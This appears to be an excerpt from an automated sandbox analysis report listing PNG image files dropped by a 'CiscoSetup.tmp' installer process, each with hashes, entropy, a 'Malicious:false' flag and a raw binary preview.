                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14308
                                                                                                                                                                                                  Entropy (8bit):7.981829207860698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                                                                                  MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                                                                                  SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                                                                                  SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                                                                                  SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
